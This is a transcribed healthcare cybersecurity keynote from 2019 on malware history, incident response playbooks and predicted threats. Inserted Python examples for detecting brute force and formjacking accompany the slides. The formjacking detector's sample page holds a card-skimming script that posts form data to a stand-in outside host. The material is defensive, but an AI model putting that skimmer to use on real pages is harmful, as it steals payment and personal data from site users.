Looking Towards the Future with Teachings from the Past
Cybersecurity Forum – Opening Keynote, February 11, 2019
Ron Mehring, CISSP, VP Technology & Security, CISO, Texas Health Resources
Axel Wirth, CPHIMS, CISSP, HCISPP, Distinguished Technical Architect, Symantec Corporation

Conflict of Interest

Ron Mehring, CISSP has no real or apparent conflicts of interest to report.

Axel Wirth, CPHIMS, CISSP, HCISPP is employed by Symantec, a cybersecurity vendor, but has no real or apparent conflicts of interest to report.

Learning Objectives

• Identify how cyber-attacks were actually executed and understand cyber-attack trends
• Explain how effective response to cyber-attacks can mitigate the impact and damage
• Discuss what we may expect in the coming year regarding cyber-attacks in the healthcare space
• State lessons learned from the past to assist with the present and what is anticipated in the future

Agenda

1. Evolution of Cyber-Attacks
2. Effective response and impact mitigation
3. What we may expect in the coming year
4. Lessons learned and anticipating the future
5. Discussion / Q&A

Cybersecurity – Historic Timeline

Ancient History (1940 – 1980s):
• 1949 – Theory of self-replicating code (J. von Neumann)
• 1950s – "Core Wars" game (Bell Labs)
• 1970 – First fully-functional virus (V. Risak, TU Vienna, Siemens)
• 1972 – "Creeper" concept demo (ARPANET, PDP-10)
• 1973 – "A Disease of Machinery" (Westworld, MGM)
• 1980 – Analogy to biological virus (J. Kraus, U. of Dortmund)
• 1984 – General definition of "virus" (F. Cohen, USC)

Middle Ages (1980s – 2000s):
• 1982 – "Elk Cloner" released (15-year-old author, Apple II)
• 1986 – "Brain", tracking copyright violations (MS-DOS)
• 1987 – "SCA" leads to first virus checker (Amiga, est. 40% infected)
• 1989 – "AIDS" Trojan, first ransomware (MS-DOS)
• 1995 – "Concept", first macro virus (MS Word)
• 1999 – "Melissa", first social engineering virus; 20% of the world's computers
• 2000 – "ILOVEYOU", million+ infections in hours
• 2002 – "SQL Slammer", fastest worm

Modern Age (2000s – today):
• 2007/08 – Reports of cyber attacks on Syria, Ukraine and Georgia
• 2008 – "Conficker" infects est. 15M computers
• 2010 – Attack on the Iranian nuclear program
• 2011/12 – Multiple highly sophisticated viruses
• 2013 – "CryptoLocker" ransomware; "Darlloz" IoT virus
• 2016 – "Mirai", highly disruptive IoT DDoS, up to 1 Tbit/s
• 2017 – "WannaCry" & "Petya" cause $B+ losses

Conficker – Happy 10th Birthday

• Conficker (W32.Downadup):
  – 5 variants produced (Nov. 2008 – April 2009)
  – Win2k, XP, Server 2003 & 2008, Vista
  – Multiple purposes: open backdoors, spam bot, keylogger, download other malware, …
  – Multiple propagation methods: LAN, shared folders, mapped drives, peer-to-peer networking, portable media (USB)
  – Estimated to have infected up to 15 million computers (compare: WannaCry: 350,000)
• Advanced capabilities and highly resilient:
  – Hides and replicates before becoming active
  – Scans the network for machines with the same vulnerability (MS08-067 in the Windows Server service)
  – Has the capability to protect itself (e.g. disable AV and Windows updates)
• Still prevalent – but limited impact:
  – No active C&C servers
  – Fewer infections as target OSs are declining; may have run its course by 2020
  – Latent infections residing on legacy systems, e.g. leading malware in healthcare (June 2016)
• Other noteworthy facts:
  – $250,000 bounty still available!
  – The end goal of Conficker has never become clear
• Other long-living malware: Sality (2003), MyDoom (2004), Mirai (2016)

Rolling with Opportunities

• Mealybug cyber crime actor:
  – Active since at least 2014
  – Initially targeting the banking industry in Europe
  – Custom malware Trojan.Emotet (network worm)
  – Brute force attack via password list
• Started shifting focus in 2017:
  – Providing delivery services for other threat actors, with Trojan.Emotet functioning as a "loader"
  – Europe → U.S. (Canada, Mexico, China)
• Key modules, per direction of the C&C server:
  – Banking module – steals banking details from network traffic
  – Email client infostealer – email credentials
  – Browser infostealer – browsing history and passwords
  – PST infostealer – email addresses
  – DDoS module – carry out DDoS attacks
• Mealybug, as an evolving threat actor, has been refining its techniques:
  – Shifted from a few regional banking attacks to a global distributor for other groups
  – Maximizing returns based on core competency and the tools available
Source: Symantec ISTR

High Impact Malware – Care Delivery, Supply Chain, Privacy

WannaCry, Petya:
• EternalBlue exploit (NSA leak)
• WannaCry (May 2017): faulty ransomware, ~$4–$8B global impact
• Petya (June 2017): cloaked ransomware (wiper), ~$10B impact
• WannaCry – care delivery impact:
  – 81 of 236 hospital trusts; 595 of 7,545 GP practices
  – 1,000+ systems, 19,000 appointments, ~£92M loss
  – Root cause: underinvestment, patching
  – Leading to £21M security investment
• WannaCry still active!
• Petya – healthcare supply chain:
  – Global pharma company – ~$310M loss, global drug and vaccine availability
  – Transcription service provider – ~$68M loss, impacted hosted transcription service

Trojan.Nibatad:
• Largest national HC provider, SE Asia
• July 2018 attack
• 1.5M records, incl. Prime Minister
• Post mortem report:
  – Breach identified, but no action taken
  – Missing risk assessment
  – Lack of training, awareness, and concern
  – Lack of vulnerability scans and pen testing
  – Missing patch, poor password policies
• 16 recommendations (7 critical):
  – Enhance security structure
  – Review and assess cyber security stack
  – Improved staff awareness – prevent, detect, and respond to security incidents
  – Enhanced security checks
  – Tighten privileged admin account controls
  – Improve incident response processes
  – Private/public partnerships around security

Summary – Threat Landscape

Trends continue to follow money and opportunity:
• Worms are back: hitting networks today; expect next-generation IoT worms
• Targeted attacks are hitting diverse targets: profiling, targeting, and execution continue to improve (e.g. Orangeworm group – healthcare)
• Email malware rates are increasing again: dropped 50% in 2017, back up in 1H 2018
• BEC scams continue to be profitable: Business Email Compromise, $12B loss in 6 years
• Ransomware numbers are stable: crowded market, some have moved on
• Cryptojacking remains popular, but rises and falls with cryptocurrency value
• IoT devices are the soft target: patching, default credentials, forgotten; 159% increase of attacks (7/17 – 7/18)

Top 10 malware, 12/2018 (Source: CIS): Emotet, Kovter, ZeuS, NanoCore, Cerber, Gh0st, CoinMiner, Trickbot, WannaCry, Xtrat
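Trojan.Emotet's brute force against a password list (Mealybug slide above) and the weak password policies in the Nibatad post mortem both leave the same trace in authentication logs: clusters of failures from one source. The block below is an added example, not code from the presentation, of the detection side. It parses constructed auth log lines (the `src=/user=/result=` line format and the thresholds are assumptions), separates single-account brute force from password spraying across many accounts, and flags a source whose failures are followed by a success.

```python
"""Brute-force and password-spray detection over authentication logs.

Added example (not code from the presentation). The log line format
'<iso-timestamp> src=<addr> user=<account> result=FAIL|SUCCESS' and the
thresholds are assumptions; the sample lines are constructed, not real data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one host hammering a single account and then getting in,
# one host trying one password against many accounts, one ordinary user typo.
SAMPLE_LOG = """\
2019-02-11T09:00:01 src=10.0.5.23 user=jsmith result=FAIL
2019-02-11T09:00:02 src=10.0.5.23 user=jsmith result=FAIL
2019-02-11T09:00:03 src=10.0.5.23 user=jsmith result=FAIL
2019-02-11T09:00:04 src=10.0.5.23 user=jsmith result=FAIL
2019-02-11T09:00:05 src=10.0.5.23 user=jsmith result=FAIL
2019-02-11T09:00:06 src=10.0.5.23 user=jsmith result=FAIL
2019-02-11T09:00:07 src=10.0.5.23 user=jsmith result=SUCCESS
2019-02-11T09:01:00 src=10.0.7.40 user=alee result=FAIL
2019-02-11T09:01:01 src=10.0.7.40 user=bkim result=FAIL
2019-02-11T09:01:02 src=10.0.7.40 user=cnguyen result=FAIL
2019-02-11T09:01:03 src=10.0.7.40 user=dpatel result=FAIL
2019-02-11T09:01:04 src=10.0.7.40 user=eross result=FAIL
2019-02-11T09:01:05 src=10.0.7.40 user=fwong result=FAIL
2019-02-11T09:05:00 src=10.0.9.12 user=ghall result=FAIL
2019-02-11T09:05:30 src=10.0.9.12 user=ghall result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse_log(text):
    """Parse log lines into events; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "src": m["src"],
            "user": m["user"],
            "ok": m["result"] == "SUCCESS",
        })
    return events


def detect(events, window=timedelta(minutes=5), min_failures=5, spray_accounts=5):
    """Return one finding per source whose failures in any `window` reach
    `min_failures`. Failures spread over `spray_accounts` or more distinct
    accounts are classed as password spraying (one guess per account, which
    evades per-account lockout); otherwise as brute force. A success from the
    same source after the failures is flagged as a likely compromise."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        fails = [e for e in evs if not e["ok"]]
        # densest run of failures inside the sliding window
        best, start = [], 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 > len(best):
                best = fails[start:end + 1]
        if len(best) < min_failures:
            continue
        accounts = {e["user"] for e in best}
        kind = "password_spray" if len(accounts) >= spray_accounts else "brute_force"
        last_fail = best[-1]["ts"]
        findings.append({
            "src": src,
            "kind": kind,
            "failures": len(best),
            "accounts": sorted(accounts),
            "followed_by_success": any(e["ok"] and e["ts"] > last_fail for e in evs),
        })
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f)
```

The two classes matter because they call for different responses: brute force against one account is handled by lockout and a credential reset, while spraying defeats per-account lockout and is only visible when failures are grouped by source rather than by account. On Windows estates the same logic is fed from event IDs 4625 (failure) and 4624 (success).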

Effective Response

1. Preparation – Getting Organized: Preparation is the key to managing the incident response cycle and reducing impact.
2. Execution – Detection and Response: Response activities must account for multiple conditions and the complexity of the organization.
3. Communication – Escalation and Peering: Timely escalation to peering response groups and leadership teams.

Effective Response: Preparation

Phases: Preparation | Analysis/Detection | Containment | Eradication | Recovery | Post Incident Activity

• Threat Catalog – Catalog of potential threats with associated response playbooks.
• Asset Inventory – Accurate inventory of technology assets that includes location, criticality and use.
• Identity Inventory – Accurate inventory of identities and entitlements across the technology and application portfolio.
• Data Inventory – Inventory of sensitive data and data flows.
• Exercises – Incident exercise plan tailored to unique environments and playbooks.
• Tool Management – Inventory of analytics and response tools.

Effective Response: Execution

1. Protect Data Confidentiality – Regulated data, credit card data. Requirements may conflict with patient safety needs.
2. Protect the Enterprise – Control robustness must balance reliability and security.
3. Protect the Patient – Medical devices and other critical care device protection needs may conflict with data confidentiality requirements.

Risk-based protection, detection and response seeks an equilibrium between 01 Privacy, 02 Cybersecurity and 03 Patient Safety; the response plan is built in the preparation phase.

• Effective incident response plans account for diverse operating environments and stakeholder response needs.
• Playbooks: reduction in time to respond and remediate.

Effective Response: Playbooks


Example: Malware Attack Playbook – Cyber Incident Response Phases

Cascading unique playbooks, selected by:
• What type of attack?
• What type of asset, identity, data type?
• Exposure?

Stakeholder groups: Treasury (PCI), Privacy, Patient Safety, Physical Security, HICS/System Preparedness, JV/Business Partners/Vendors
Response teams: Cyber/Technology Teams, HTM (Medical Devices), Legal, HR, Risk Financing, Facilities, Business Process Owners
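The Preparation, Execution and Playbooks slides above describe one procedure: the inventories built in preparation answer the "what asset, identity, data type, exposure?" questions that pick the cascading playbooks and the stakeholders to bring in. The block below is an added example, not code from the presentation, that runs that cascade. The inventory entries, playbook names, stakeholder group names and the rule that a medical device is never auto-isolated are constructed assumptions for illustration.

```python
"""Cascading playbook selection driven by the preparation inventories.

Added example (not code from the presentation). Inventory contents, playbook
names and stakeholder groups are constructed for illustration.
"""

# Asset inventory (constructed): location, criticality and use per asset.
ASSETS = {
    "infusion-pump-42": {"location": "ICU-3", "criticality": "high", "use": "medical_device"},
    "pos-terminal-7": {"location": "Cafeteria", "criticality": "low", "use": "payment"},
    "ehr-app-01": {"location": "DC-East", "criticality": "high", "use": "clinical_app"},
    "hr-laptop-118": {"location": "Admin", "criticality": "low", "use": "workstation"},
}

# Data inventory (constructed): sensitive data classes held by or flowing through each asset.
DATA = {
    "infusion-pump-42": {"PHI"},
    "pos-terminal-7": {"PCI"},
    "ehr-app-01": {"PHI"},
    "hr-laptop-118": set(),
}

# Identity inventory (constructed): entitlements of accounts that may appear in an alert.
IDENTITIES = {
    "svc-backup": {"privileged": True, "scope": ["ehr-app-01", "hr-laptop-118"]},
    "jsmith": {"privileged": False, "scope": ["hr-laptop-118"]},
}


def select_playbooks(attack, asset_id, account=None):
    """Cascade attack type -> exposure -> asset/data/identity attributes.

    Returns the ordered playbooks to run, the stakeholder groups to bring in,
    the exposure set, and whether automatic network containment is permitted.
    """
    asset = ASSETS[asset_id]
    ident = IDENTITIES.get(account, {})

    # Exposure: the alerted asset plus everything a compromised privileged
    # account is entitled to reach (the "Exposure?" question on the slide).
    exposure = {asset_id}
    if ident.get("privileged"):
        exposure |= set(ident["scope"])
    data = set().union(*(DATA.get(a, set()) for a in exposure))

    playbooks = [f"{attack}-base"]  # generic playbook for the attack type
    stakeholders = {"Cyber/Technology"}
    auto_contain = True

    # Asset cascade: a medical device is a patient-safety matter first;
    # isolating it could interrupt care, so HTM confirms before containment.
    if asset["use"] == "medical_device":
        playbooks.append(f"{attack}-medical-device")
        stakeholders |= {"Patient Safety", "HTM (Medical Devices)"}
        auto_contain = False

    # Data cascade: regulated data classes bring their own playbooks and owners.
    if "PHI" in data:
        playbooks.append("privacy-breach-assessment")
        stakeholders |= {"Privacy", "Legal"}
    if "PCI" in data:
        playbooks.append("pci-incident")
        stakeholders |= {"Treasury (PCI)", "Legal"}

    # Identity cascade: a privileged account is reset and risk financing is
    # told, because the exposure is no longer a single asset.
    if ident.get("privileged"):
        playbooks.append("privileged-credential-reset")
        stakeholders.add("Risk Financing")

    # Criticality cascade: any high-criticality asset in scope escalates to
    # the hospital incident command structure.
    if any(ASSETS[a]["criticality"] == "high" for a in exposure):
        stakeholders.add("HICS/System Preparedness")

    return {
        "playbooks": playbooks,
        "stakeholders": sorted(stakeholders),
        "exposure": sorted(exposure),
        "auto_contain": auto_contain,
    }


if __name__ == "__main__":
    for args in [("malware", "infusion-pump-42"),
                 ("ransomware", "hr-laptop-118", "svc-backup"),
                 ("malware", "pos-terminal-7", "jsmith")]:
        print(args, select_playbooks(*args))
```

The point of computing exposure before the data cascade is the one the slide makes under "Exposure?": a low-value workstation alert becomes a PHI incident as soon as the account seen on it has entitlements to a clinical system, and the privacy playbook must fire even though the laptop itself holds nothing sensitive. The `auto_contain` flag is where the conflict between data confidentiality and patient safety is resolved in advance rather than by an analyst under pressure.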

Effective Response: Communication

A robust communication plan that reflects the different cyber incident stakeholder groups is critical to controlling incident impacts.

• The need to communicate effectively before, during and after an incident should not be underestimated.

• Preparation phase requirements and inputs should be well understood by technology/data custodians and system owners.

• Timing of stakeholder involvement is important.

• Balancing incident sensitivity classification and transparency must be addressed up front.


What to Expect for 2019 – The Big Picture / Broader and Continuing Trends

Political cyber-conflicts will be a growing risk:
• A serious cyber event with socio-economic impact is increasingly likely
• Continued evolution of cyber conflicts for strategic and economic benefits

Growing attack surface – attackers roll with opportunities:
• Digitization (more data)
• Digitalization (more digital infrastructure)
• Technology adoption (IoT, cloud, 5G, AI/ML)

New and creative attack vectors:
• Supply chain as attack vector
• Data-in-motion attacks

Consequently:
• We will continue to see big names in the headlines
• It will not just be about confidentiality anymore

What to Expect for 2019 – AI & ML

Let's not confuse the two – AI/ML refer to the capability of a machine to:
• ML = learn without explicitly being programmed (= learning)
• AI = imitate intelligent human behavior (= perception, decision, autonomy)

Defenders will increasingly depend on ML/AI to counter attacks and identify vulnerabilities:
• Reliable and fast analysis of large, complex (and boring) data sets across multiple internal and external security control points
• Analyze information with no apparent logical or discernible pattern
• Rapid identification of new exploits (threat intelligence)
• Predictive protection (automate identification and response)
• Augment human talent (or lack thereof)

Us vs. Them vs. Us

Attackers will exploit ML/AI systems and use them to aid their assaults:
• Craft new attacks, uncover new vulnerabilities (zero days)
• Circumvent our ML/AI defenses through model extraction or poisoning

What to Expect for 2019 – AI & ML

ML / AI Utilization and Benefits – Examples

Defenders:
• Identify new threats and provide better (faster) threat intelligence
• Uncover & fix new vulnerabilities
• Advanced attack simulations
• Better detection and response capabilities
• Protect digital security and privacy (UBA, ID protection, content monitoring)

Attackers:
• Corrupt AI-based business systems
• Support intelligence and reconnaissance (network probing, vulnerabilities)
• Sophisticated and tailored social engineering attacks
• Realistic disinformation campaigns
• AI-powered toolkits and services

The "Terminator Wars" of the future will likely occur in cyber space and play out at a scale, speed, and cost that humans cannot match

Technology Adoption as Opportunity

5G – from 1 Gbps to 10 Gbps, a $26B market by 2022 (IDG)

Technology Trends and Impact:
• 5G will drive other technologies and make them even more attractive:
  – Cloud – any data anywhere
  – Mobile – slow consumer adoption may limit penetration, but 5G will enable cheaper devices (less storage)
  – IoT – new IoT devices will provide 5G "out of the gate" and enable convenience and new value-added services
• IoT (and other) device traffic will bypass home routers and enterprise networks
• Crossover within a few years: more 5G devices will connect directly to public networks than via Wi-Fi routers

Opportunity for Adversaries:
• Expanded attack surface area
• Circumvent enterprise and home security controls
• Direct attack on devices
• Leverage device as "bridgehead"
• Capture or manipulate "data in motion" or poorly protected cloud accounts
Source: Symantec ISTR

Technology Adoption as Opportunity – IoT (IoMT / Embedded Systems / Medical Devices)

Technology Trends and Impact:
• Business: improve efficiency, reduce costs, benefit from more data points, etc.
• Consumer: improve comfort, ease of use, quality of life
• Enable new business and service delivery models through physical devices
• Provide service where the consumer (patient) is

Opportunity for Adversaries:
• Exploit poorly secured IoT infrastructure
• Bridge the virtual and physical worlds – attacks that can do damage:
  – Kinetic attacks (e.g. cars, pacemakers)
  – Critical infrastructure: utilities, food supply, ports, traffic control, finance, healthcare
• IoT-based events will move beyond massive DDoS assaults (e.g. Mirai):
  – Ransom, blackmail, stalking, etc.
Source: Symantec ISTR

Other Relevant Threat Trends

Supply Chain Attacks:
• Deliver (malware) via trusted 3rd party software (e.g. Petya):
  – Difficult to identify: trusted domain, digitally signed, trusted update process
  – Benefits: rapid distribution within a targeted industry or region
  – Circumvent traditional security controls, access with elevated privileges
  – Caveat: a valid code signature shows who signed the update, not that the publisher's build or update server was clean
• Potential to infect and utilize the hardware supply chain in the future:
  – Such an attack would be highly sophisticated and difficult to detect
  – Resistant to malware removal, reboot, reformatting, or reinstallation

Data-in-Transit Attacks:
• Gain access to routers and other network infrastructure:
  – Steal credentials, account, or other confidential information
  – Deliver a compromised web page to capture confidential information (a variation of "formjacking")
  – Manipulate data between sender and recipient

Regulatory and Legislative Action

GDPR (European General Data Protection Regulation) set the stage
• Other nations are following suit (Canada, Brazil)
Distinct drivers are evolving: compliance, security, privacy, safety
• U.S. has traditionally had a disparate approach (by state or by industry):
  – In 2018, California passed the toughest privacy law yet
  – Federal security and/or privacy laws may evolve over the next few years
  – Revision of the HIPAA Privacy Rule is under discussion
  – FDA guidances on medical device cybersecurity
  – NIST Cybersecurity Framework
  – NIST Privacy Framework (in progress)
  – HHS Cybersecurity Working Group and the resulting Task Group workstreams
  – Multiple House and Senate bills in process (medical devices, IoMT, IoT, certification)
• An uptick in legislative and regulatory security and privacy action is certain:
  – Improve consumer rights and protection
  – Reduce the risk of breach or harm
  – Harmonize requirements across regions and industries
  – Balanced with the need for information sharing
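The formjacking variant on the data-in-transit slide above (a compromised page delivered through captured network infrastructure) changes what the browser loads or where a form posts, while the page still arrives from the expected site. The block below is an added example, not code from the presentation, of an integrity audit of a served page against a baseline recorded from the known-good version: script origins, hashes of known inline scripts, and the expected form target. The hostnames, the baseline and the sample page are constructed assumptions.

```python
"""Detect formjacking-style modifications of a served web page.

Added example (not code from the presentation). The baseline, hostnames and
sample page are constructed; in production the baseline is recorded from a
known-good fetch and the audit runs against what users actually receive.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Baseline recorded from the known-good page (constructed): allowed script
# origins, SHA-256 of each known inline script, and the expected form targets.
BASELINE = {
    "script_origins": {"checkout.example-hospital.org", "cdn.example-hospital.org"},
    "inline_script_hashes": {hashlib.sha256(b"initCheckout();").hexdigest()},
    "form_actions": {"checkout.example-hospital.org"},
}

# Constructed sample: the legitimate page with an injected skimmer script and a
# form whose action now points at an attacker-controlled host.
SAMPLE_PAGE = """<html><body>
<script src="https://cdn.example-hospital.org/app.js"></script>
<script>initCheckout();</script>
<script src="https://static.example-cdn.net/jquery.min.js"></script>
<script>document.forms[0].onsubmit=function(){fetch('https://static.example-cdn.net/c',{method:'POST',body:new FormData(this)})};</script>
<form action="https://pay.example-collector.net/submit" method="post">
<input name="card"><input name="cvv">
</form>
</body></html>"""


class _Collector(HTMLParser):
    """Collect external script sources, inline script bodies and form actions."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self.form_actions = [], [], []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external.append(a["src"])
            else:
                self._in_script = True
                self._buf = []
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def _host(url):
    return urlparse(url).hostname or ""


def audit_page(html, baseline=BASELINE):
    """Return (kind, detail) findings for anything on the page not in the baseline."""
    c = _Collector()
    c.feed(html)
    findings = []
    for src in c.external:
        if _host(src) not in baseline["script_origins"]:
            findings.append(("unexpected_script_origin", src))
    for code in c.inline:
        if hashlib.sha256(code.encode()).hexdigest() not in baseline["inline_script_hashes"]:
            findings.append(("unknown_inline_script", code[:60]))
    for action in c.form_actions:
        if _host(action) not in baseline["form_actions"]:
            findings.append(("form_exfil_target", action))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_PAGE):
        print(kind, detail)
```

The same three checks are what a Content Security Policy (script-src allowlist, form-action) and Subresource Integrity enforce inside the browser; the audit above is the out-of-band version, run as a synthetic check from outside the network path, so that it also catches a page altered by infrastructure between the server and the user.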

What have we learned

1. Orchestration – Playbooks and Automation: Threat models will need to have dynamically assigned actions with predefined escalation.
2. Analytics – Detection and Response: Response activities must account for complex environments.
3. Post Incident – Lessons Learned: Risk management and root cause analysis provide an important feedback loop.

What have we learned: Orchestration

Advancing orchestration capabilities will be key in handling current and future threats. People training will be key!

What have we learned: Analytics

Speed and quantity of attacks are increasing. This will require data to become a stronger factor in reducing friction within response processes.

• Improving system-to-system interfaces and automation to reduce response dwell time.
• Artificial intelligence and behavioral analytics are required to better inform analysts and improve the response cycle.

[Figure: John Boyd's OODA Loop – Observe, Orient, Decide, Act – applied from Event to Incident]

What have we learned: Integration

• AI and analytics will need to be considered to help drive orchestration/automation and analyst practices, to improve time-to-detect and time-to-respond performance.
• Security architecture planning, reliability engineering and development of performance measures will be critical.
• Integrating analytics into a continuous controls testing model and security architecture will be necessary to keep up with changing business, architectures, and development cycles.

[Figure: analyst time consumption versus number of events/alerts to be acted on. Labels in the figure: village elders, rule of thumb, heuristics; event analytics systems; AI/behavioral analytics; advanced cyber operations; orchestration platform and processes; opportunity for AI and behavioral analytics. Target state: low quantity, minimal time, high fidelity.]

What have we learned: Post Incident


• Risk – Provides transparency for executive leadership and defines risk tolerance, policy and remediation investment priorities.
• Feedback – A control architecture review helps define the requirements and control robustness signaling between risk and operations.
• Operations – Coordinates root cause analysis of bad outcomes (incidents or control performance issues). Operations consumes risk decisions and advances or corrects processes and technologies.

Questions

“There's a clear pattern here which suggests an analogy to an infectious disease process, spreading from one area to the next. … I must confess, I find it difficult to believe in a disease of machinery." From the Movie Westworld (1973)

Ron Mehring, CISSP Axel Wirth, CPHIMS, CISSP, HCISPP 682-236-8282 617-999-4035 [email protected] [email protected] @mehringrc @axel_wirth

Further Reading

• Scientific American: "When and how did the metaphor of the computer 'virus' arise?", https://www.scientificamerican.com/article/when-and-how-did-the-meta/
• Richard Clarke: "Cyber War: The Next Threat to National Security and What to Do About It", April 2012, https://www.amazon.com/gp/product/0061962244
• Bruce Schneier: "Click Here to Kill Everybody: Security and Survival in a Hyper-connected World", Sept. 2018, https://www.amazon.com/dp/0393608883
• The Conficker Working Group, http://www.confickerworkinggroup.org/wiki/pmwiki.php
• Magnolia Pictures: "Zero Days", July 2016, https://www.imdb.com/title/tt5446858/
• ISE: "Hacking Hospitals", Feb. 2016, https://www.securityevaluators.com/hospitalhack/
• UK Health and Social Care System: "Lessons learned review of the WannaCry Ransomware Cyber Attack", Feb. 2018, https://www.england.nhs.uk/wp-content/uploads/2018/02/lessons-learned-review-wannacry-ransomware-cyber-attack-cio-review.
• AAMI: "Medical Device Cybersecurity – A Guide for HTM Professionals", June 2018, http://www.aami.org/productspublications/ProductDetail.aspx?ItemNumber=6489
• Symantec: "Internet Security Threat Report", annual, http://www.symantec.com/threatreport
• HIMSS Privacy & Security Committee, https://www.himss.org/library/healthcare-privacy-security
• NIST SP 800-61, "Computer Security Incident Handling Guide", https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-61r2.pdf
• Ponemon Institute: "The Value of AI in Cybersecurity", July 2018, https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=41017541USEN